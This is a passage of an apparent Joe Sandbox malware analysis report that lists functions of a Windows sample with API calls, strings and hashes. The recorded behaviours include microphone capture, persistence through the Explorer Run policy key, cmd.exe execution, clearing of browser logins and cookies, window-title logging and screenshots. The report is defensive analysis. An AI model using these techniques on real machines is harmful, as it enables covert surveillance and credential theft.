                                • waveInPrepareHeader.WINMM(00556A30,00000020,?,?,00476B50,00474EE0,?,00000000,00401A15), ref: 00401849
                                • waveInAddBuffer.WINMM(00556A30,00000020,?,00000000,00401A15), ref: 0040185F
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: wave$BufferHeaderPrepare
                                • String ID: 0jU$XMG
                                • API String ID: 2315374483-2349053105
                                • Opcode ID: db4cc151110a5f9a71eb5ce2d7546914e9eb517e880c4322ad0588f055fadbe6
                                • Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
                                • Opcode Fuzzy Hash: db4cc151110a5f9a71eb5ce2d7546914e9eb517e880c4322ad0588f055fadbe6
                                • Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041CAE1 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 42windowCOMMON
                                Download Yara Rule
                                APIs
                                • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000,00474EF8,00474EF8,PkGNG,00404A40), ref: 0041CB09
                                • LocalFree.KERNEL32(?,?), ref: 0041CB2F
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: FormatFreeLocalMessage
                                • String ID: @J@$PkGNG
                                • API String ID: 1427518018-1416487119
                                • Opcode ID: e6692f477abb5315ab95d0a6b8ad5d72714dea7d13d74ae1a0c0e8a867cee630
                                • Instruction ID: 02a9d8e2c753fe243ccbc909122ce1ddd8f8b45a09ed5088e6b723b988b0f700
                                • Opcode Fuzzy Hash: e6692f477abb5315ab95d0a6b8ad5d72714dea7d13d74ae1a0c0e8a867cee630
                                • Instruction Fuzzy Hash: 5EF0A434B0021AAADF08A7A6DD4ADFF7769DB84305B10007FB606B21D1EEB86D05D659
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00413814 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegCreateKeyW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?), ref: 0041381F
                                • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,?,?,?,?,00000000,004752D8,759237E0,?), ref: 0041384D
                                • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,004752D8,759237E0,?,?,?,?,?,0040CFAA,?,00000000), ref: 00413858
                                Strings
                                • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0041381D
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseCreateValue
                                • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                • API String ID: 1818849710-1051519024
                                • Opcode ID: 7402a2b63bcdafcb128c4f053b5539bf219f88ac2658cd62b5e42ce82679dadc
                                • Instruction ID: 91b44a8789fefabe47d0aed0b401f4e945a8dec35bb1902c17c37083bf943f80
                                • Opcode Fuzzy Hash: 7402a2b63bcdafcb128c4f053b5539bf219f88ac2658cd62b5e42ce82679dadc
                                • Instruction Fuzzy Hash: 83F0C271440218FBDF10AFA1EC45FEE376CEF00B56F10452AF905A61A1E7359F04DA94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041376F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046611C), ref: 0041377E
                                • RegSetValueExA.ADVAPI32(0046611C,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000), ref: 004137A6
                                • RegCloseKey.ADVAPI32(0046611C,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000,?,0040875D,00000001), ref: 004137B1
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseCreateValue
                                • String ID: Control Panel\Desktop
                                • API String ID: 1818849710-27424756
                                • Opcode ID: a1b035586d8a94c78f1a8b9bfdab4f73b16582c77fe3bde9cdb94950c835db19
                                • Instruction ID: c04290829ccef693e4e8b5b7d06cdf9a2950efbbd707a4c1379ff92f90edcb59
                                • Opcode Fuzzy Hash: a1b035586d8a94c78f1a8b9bfdab4f73b16582c77fe3bde9cdb94950c835db19
                                • Instruction Fuzzy Hash: B8F06272400118FBCB009FA1DD45DEA376CEF04B51F108566FD09A61A1D7359E14DB54
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004160EE Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON
                                Download Yara Rule
                                APIs
                                • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 00416130
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExecuteShell
                                • String ID: /C $cmd.exe$open
                                • API String ID: 587946157-3896048727
                                • Opcode ID: c4367f8ee6a7455f33dbff058f7f38a065b0826cdce92a2e59ef50dc08291be7
                                • Instruction ID: 0a18f3537a1213b4b5dca9b82f73c842755a7e35c30cee8a650de64661b344da
                                • Opcode Fuzzy Hash: c4367f8ee6a7455f33dbff058f7f38a065b0826cdce92a2e59ef50dc08291be7
                                • Instruction Fuzzy Hash: 0DE0C0B0208345AAC705E775CC95CBF73ADAA94749B50483F7142A20E2EF7C9D49C659
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040C00C Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                • Cleared browsers logins and cookies., xrefs: 0040C0F5
                                • [Cleared browsers logins and cookies.], xrefs: 0040C0E4
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: Sleep
                                • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                • API String ID: 3472027048-1236744412
                                • Opcode ID: 37d1bfc06d07939eb796f91d911b97d059918d73889df1aded7d392522dc90d3
                                • Instruction ID: fac43f66edf0589ccdcbb227709f1a337e776f7542e83b73a027453bfa593f46
                                • Opcode Fuzzy Hash: 37d1bfc06d07939eb796f91d911b97d059918d73889df1aded7d392522dc90d3
                                • Instruction Fuzzy Hash: 2531C804348380E9D6116BF554567AB7B814E93744F08457FB9C42B3D3D97E4848C7AF
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004194C4 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                Download Yara Rule
                                APIs
                                • EnumDisplayMonitors.USER32(00000000,00000000,004195CF,00000000), ref: 004194F5
                                • EnumDisplayDevicesW.USER32(?), ref: 00419525
                                • EnumDisplayDevicesW.USER32(?,?,?,00000000), ref: 0041959A
                                • EnumDisplayDevicesW.USER32(00000000,00000000,?,00000000), ref: 004195B7
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: DisplayEnum$Devices$Monitors
                                • String ID:
                                • API String ID: 1432082543-0
                                • Opcode ID: c3c799bd19875220888047b0ecefc3fe56039ce96ce98d62d0ecf08c91911ae4
                                • Instruction ID: 9f89b1fc864c89aa53311e19646eec67f909338e1adf78e73a6452d568b12732
                                • Opcode Fuzzy Hash: c3c799bd19875220888047b0ecefc3fe56039ce96ce98d62d0ecf08c91911ae4
                                • Instruction Fuzzy Hash: 6F218072108314ABD221DF26DC49EABBBECEBD1764F00053FF459D3190EB749A49C66A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004126DB Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 93sleepCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 004136F8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 00413714
                                  • Part of subcall function 004136F8: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 0041372D
                                  • Part of subcall function 004136F8: RegCloseKey.ADVAPI32(?), ref: 00413738
                                • Sleep.KERNEL32(00000BB8), ref: 0041277A
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseOpenQuerySleepValue
                                • String ID: 8SG$exepath$hdF
                                • API String ID: 4119054056-3379396883
                                • Opcode ID: bfa7946a20d0ba0244eb19560f4c3b0d7a78169555de0d07121ed9ca0cce8570
                                • Instruction ID: f3cf03c5a64ef847c6da3637c810c9cb64e8e240b2c65477c235684d5dc29c85
                                • Opcode Fuzzy Hash: bfa7946a20d0ba0244eb19560f4c3b0d7a78169555de0d07121ed9ca0cce8570
                                • Instruction Fuzzy Hash: B52148A0B0030427DA00B7366D46EBF724E8B84318F40443FB916E72D3EEBC9C48426D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040A529 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71sleepCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0041C551: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041C561
                                  • Part of subcall function 0041C551: GetWindowTextLengthW.USER32(00000000), ref: 0041C56A
                                  • Part of subcall function 0041C551: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041C594
                                • Sleep.KERNEL32(000001F4), ref: 0040A573
                                • Sleep.KERNEL32(00000064), ref: 0040A5FD
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: Window$SleepText$ForegroundLength
                                • String ID: [ $ ]
                                • API String ID: 3309952895-93608704
                                • Opcode ID: 4603c95d7a0278816d05f17b1e103e1b56ebf32c1baad14edcc254fcbbfd146b
                                • Instruction ID: 97bd403738d1ca0cb59e80c1fc79ee6201ed0cb329172f4776a94889a39aca56
                                • Opcode Fuzzy Hash: 4603c95d7a0278816d05f17b1e103e1b56ebf32c1baad14edcc254fcbbfd146b
                                • Instruction Fuzzy Hash: FE119F315043006BC614BB65CC5399F77A8AF50308F40053FF552665E2FF79AA5886DB
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041B7FF Relevance: 6.1, APIs: 4, Instructions: 63timesleepCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: SystemTimes$Sleep__aulldiv
                                • String ID:
                                • API String ID: 188215759-0
                                • Opcode ID: 1460bbf00a7581670417fcbf42b3a1dfd5e2489cdc62901d12e8026d78940c5d
                                • Instruction ID: 72b4c32e7059473e424b83a6cc96647c38f9827b21069785d395d2d8421d6a64
                                • Opcode Fuzzy Hash: 1460bbf00a7581670417fcbf42b3a1dfd5e2489cdc62901d12e8026d78940c5d
                                • Instruction Fuzzy Hash: B0113D7A5083456BD304FAB5CC85DEB7BACEAC4654F040A3EF54A82051FE68EA4886A5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00443A33 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e504ac4fddb0f8a25c6be19684a152be264dadb57d82260706401bb5bc5fb7a8
                                • Instruction ID: 17f232e73e96fb976a24982deb7d35e81c220cd9520ca4ef7e8dcf180de91df6
                                • Opcode Fuzzy Hash: e504ac4fddb0f8a25c6be19684a152be264dadb57d82260706401bb5bc5fb7a8
                                • Instruction Fuzzy Hash: 1301F2B36497067EFA202E786CC1F67220CDF41BBEB34032BB574712D1DA68CE404568
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00443AB2 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 253450334f16ac4bada5e464aed069c53fdbe8794578123440a1a1ba72333804
                                • Instruction ID: 34d970f17befced98e3ca294e9c9a609e5e7bfbb0444a55afbb34e25ce639c56
                                • Opcode Fuzzy Hash: 253450334f16ac4bada5e464aed069c53fdbe8794578123440a1a1ba72333804
                                • Instruction Fuzzy Hash: 0601A2B26096117EFA111E796CC4E27624CDB81BBF325032BF535612D6DA688E014169
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041C485 Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                                • GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C4B2
                                • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C4D7
                                • CloseHandle.KERNEL32(00000000,?,00000000,0040412F,00465E74), ref: 0041C4E5
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseCreateHandleReadSize
                                • String ID:
                                • API String ID: 3919263394-0
                                • Opcode ID: c4d28c244904a0c4b31f6914b30dbe9704a3e03414ae878e480ac2c22075bc56
                                • Instruction ID: d938e931a51b81dfe9e25773ede9364464a286a3a3b97e7b856b7b87d8bf29b3
                                • Opcode Fuzzy Hash: c4d28c244904a0c4b31f6914b30dbe9704a3e03414ae878e480ac2c22075bc56
                                • Instruction Fuzzy Hash: 0FF0C2B1245308BFE6101B25ACD4EBB375CEB867A9F00053EF902A22C1CA298C05913A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00439863 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • ___BuildCatchObject.LIBVCRUNTIME ref: 0043987A
                                  • Part of subcall function 00439EB2: ___AdjustPointer.LIBCMT ref: 00439EFC
                                • _UnwindNestedFrames.LIBCMT ref: 00439891
                                • ___FrameUnwindToState.LIBVCRUNTIME ref: 004398A3
                                • CallCatchBlock.LIBVCRUNTIME ref: 004398C7
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                • String ID:
                                • API String ID: 2633735394-0
                                • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                • Instruction ID: dcee73c62e3621a690853eebe59cad03ae51e1002f288686f44977c5109bb855
                                • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                • Instruction Fuzzy Hash: 18011732000109BBCF12AF55CC01EDA3BBAEF9D754F04511AFD5861221C3BAE861DBA5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004193E3 Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                Download Yara Rule
                                APIs
                                • GetSystemMetrics.USER32(0000004C), ref: 004193F0
                                • GetSystemMetrics.USER32(0000004D), ref: 004193F6
                                • GetSystemMetrics.USER32(0000004E), ref: 004193FC
                                • GetSystemMetrics.USER32(0000004F), ref: 00419402
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: MetricsSystem
                                • String ID:
                                • API String ID: 4116985748-0
                                • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                • Instruction ID: 9a44d86f369c7068fc2c949f9b02ed5542bf43da40f6b7222f807aea32733f55
                                • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                • Instruction Fuzzy Hash: DFF0A471B043155BD744EA759C51A6F6BD5EBD4264F10043FF20887281EE78DC468785
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00418A92 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92COMMON
                                Download Yara Rule
                                APIs
                                • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00418ABE
                                  • Part of subcall function 00418656: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418AD1,00000000,?,?,?,?,00000000), ref: 0041866A
                                • SHCreateMemStream.SHLWAPI(00000000), ref: 00418B0B
                                  • Part of subcall function 004186CB: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B27,00000000,?,?), ref: 004186DD
                                  • Part of subcall function 00418679: GdipDisposeImage.GDIPLUS(?,00418B82), ref: 00418682
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                • String ID: image/jpeg
                                • API String ID: 1291196975-3785015651
                                • Opcode ID: 8883413a241ecd6daa78ef1183ec8e175d09e4f7b2134cb7e7ff04ec22b53db4
                                • Instruction ID: 71c7567624fb1f0fb67e5b365d5baafb3eed0516d04e2b9615b8e3d4f66a2876
                                • Opcode Fuzzy Hash: 8883413a241ecd6daa78ef1183ec8e175d09e4f7b2134cb7e7ff04ec22b53db4
                                • Instruction Fuzzy Hash: 13317F71504300AFC301EF65CC84DAFB7E9FF8A704F00496EF985A7251DB7999448BA6
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00451B37 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451D92,?,00000050,?,?,?,?,?), ref: 00451C12
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
